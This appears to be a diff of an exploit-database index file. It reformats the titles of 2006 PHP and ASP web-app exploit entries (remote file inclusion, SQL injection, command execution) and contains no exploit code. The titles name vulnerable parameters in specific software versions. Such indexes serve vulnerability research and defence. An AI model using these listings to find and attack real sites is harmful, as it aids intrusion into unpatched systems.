'root' Multiple Remote File Inclusions",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 -1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 +1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - 'where' SQL Injection",2006-07-02,x23,php,webapps,0 1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 @@ -17119,9 +17120,9 @@ id,file,description,date,author,platform,type,port 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 -1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 +1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - 'pluginpath' Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 -2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution",2006-07-10,Hessam-x,php,webapps,0 +2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - 'descripcion' Remote Command Execution",2006-07-10,Hessam-x,php,webapps,0 2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - 'gore.php' Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 @@ -17129,7 +17130,7 @@ id,file,description,date,author,platform,type,port 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,php,webapps,0 -2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 +2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - 'm2f_root_path' Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0 2022,platforms/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 @@ -17146,21 +17147,21 @@ id,file,description,date,author,platform,type,port 2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 -2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 +2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 -2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0 +2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - 'page' Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0 2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 2066,platforms/php/webapps/2066.txt,"Mambo Component multibanners 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0 -2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 +2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - 'old_prefix' Blind SQL Injection",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - 'rfiles.php' Remote Command Execution",2006-07-25,rgod,php,webapps,0 -2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - (base_datapath) Remote File Inclusion",2006-07-27,uNfz,php,webapps,0 +2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - 'base_datapath' Remote File Inclusion",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,php,webapps,0 -2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 +2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - 'chemin' Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 2083,platforms/php/webapps/2083.txt,"Mambo Component Security Images 3.0.5 - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 2084,platforms/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0 @@ -17170,28 +17171,28 @@ id,file,description,date,author,platform,type,port 2089,platforms/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Remote File Inclusion",2006-07-30,Pablin77,php,webapps,0 2092,platforms/php/webapps/2092.txt,"Joomla! Component LMO 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0 -2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 -2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b - (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 -2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 +2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b - 'myng_root' Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 +2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - 'NL_PATH' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - 'copyright.php' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 -2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 +2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - 'subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - 'file_path' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection",2006-08-01,rgod,php,webapps,0 +2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - 'dwl_include_path' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - 'mq=off' 'u2uid' SQL Injection",2006-08-01,rgod,php,webapps,0 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,php,webapps,0 -2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 -2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeAdmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 -2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 +2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - Configure Script Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 +2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - 'SITE_Path' Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 +2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - 'makeAdmin' Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 +2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - 'subd' Remote File Inclusion",2006-08-02,beford,php,webapps,0 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - 'colorswitch.php' Remote File Inclusion",2006-08-02,beford,php,webapps,0 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 +2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - 'pfad' Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 2125,platforms/php/webapps/2125.txt,"Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 @@ -17200,56 +17201,56 @@ id,file,description,date,author,platform,type,port 2129,platforms/php/webapps/2129.txt,"SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - 'installed_config_file' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 -2134,platforms/php/webapps/2134.txt,"phpCC 4.2 Beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 +2134,platforms/php/webapps/2134.txt,"phpCC 4.2 Beta - 'base_dir' Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - 'abs_path' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - 'Core.php' Remote File Inclusion",2006-08-07,Minion,php,webapps,80 -2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 +2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 -2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0 -2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0 +2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - 'configure' Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0 +2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - 'INIT_PATH' Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0 2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - 'article-raw.php' Remote File Inclusion",2006-08-08,Drago84,php,webapps,80 -2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 +2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - 'REP_INC' Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0 -2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 +2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - 'CFG[libdir]' Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - 'owimg.php3' Remote File Inclusion",2006-08-09,Drago84,php,webapps,0 -2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 -2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 +2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - 'BBCodeFile' Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 +2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - 'image' Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - 'view_com.php' SQL Injection",2006-08-09,simo64,php,webapps,80 2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - 'rootpath' Remote Code Execution",2006-08-10,simo64,php,webapps,80 -2163,platforms/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 -2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 +2163,platforms/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - 'spaw' Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 +2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - 'page' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 -2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 +2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - 'page' Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80 -2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 +2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - '_BASE' Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - 'online.php' SQL Injection",2006-08-10,brOmstar,php,webapps,0 -2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 +2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - 'cabsolute_path' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 2172,platforms/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - 'session.php' Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 -2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 +2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - 'templates_dir' Remote File Inclusion",2006-08-12,K-159,php,webapps,0 2177,platforms/php/webapps/2177.txt,"Joomla! Component Webring 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - 'basename()' Remote Command Execution",2006-08-13,rgod,php,webapps,0 -2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php mail()' Remote Injection",2006-08-14,beford,php,webapps,80 +2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php?mail()' Remote Injection",2006-08-14,beford,php,webapps,80 2182,platforms/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 -2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0 +2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion",2006-08-14,"the master",php,webapps,0 2184,platforms/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps,0 2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0 -2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - (fileloc) Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps,0 +2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - 'fileloc' Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps,0 2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - 'users.php' Remote File Inclusion",2006-08-15,Yns,php,webapps,0 2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusions",2006-08-15,Kacper,php,webapps,0 2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 -2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 +2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - 'CRM_inc' Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2196,platforms/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 -2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Blind SQL Injection",2006-08-17,rgod,php,webapps,0 -2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 +2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - 'oid' Blind SQL Injection",2006-08-17,rgod,php,webapps,0 +2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - '_sysSessionPath' Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha - 'torrents.php' SQL Injection",2006-08-17,sh1r081,php,webapps,0 2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0 2202,platforms/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 @@ -17259,21 +17260,21 @@ id,file,description,date,author,platform,type,port 2207,platforms/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - Remote File Inclusion",2006-08-17,Cmaster4,php,webapps,0 2209,platforms/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - 'mod.listmail.php' Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 -2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 +2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - 'BEAUT_PATH' Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2213,platforms/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2214,platforms/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2215,platforms/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 -2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 +2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",php,webapps,0 2217,platforms/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 2218,platforms/php/webapps/2218.txt,"Interact 2.2 - 'CONFIG[base_path]' Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 2219,platforms/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 -2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 +2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - 'TNLIB_DIR' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - 'script_path' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - Remote File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 -2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 +2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - 'mainnav' Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 @@ -17282,11 +17283,11 @@ id,file,description,date,author,platform,type,port 2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 -2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 +2240,platforms/php/webapps/2240.txt,"HPE 1.0 - HPEinc Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0 -2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0 -2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 +2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - 'start' SQL Injection",2006-08-23,SpiderZ,php,webapps,0 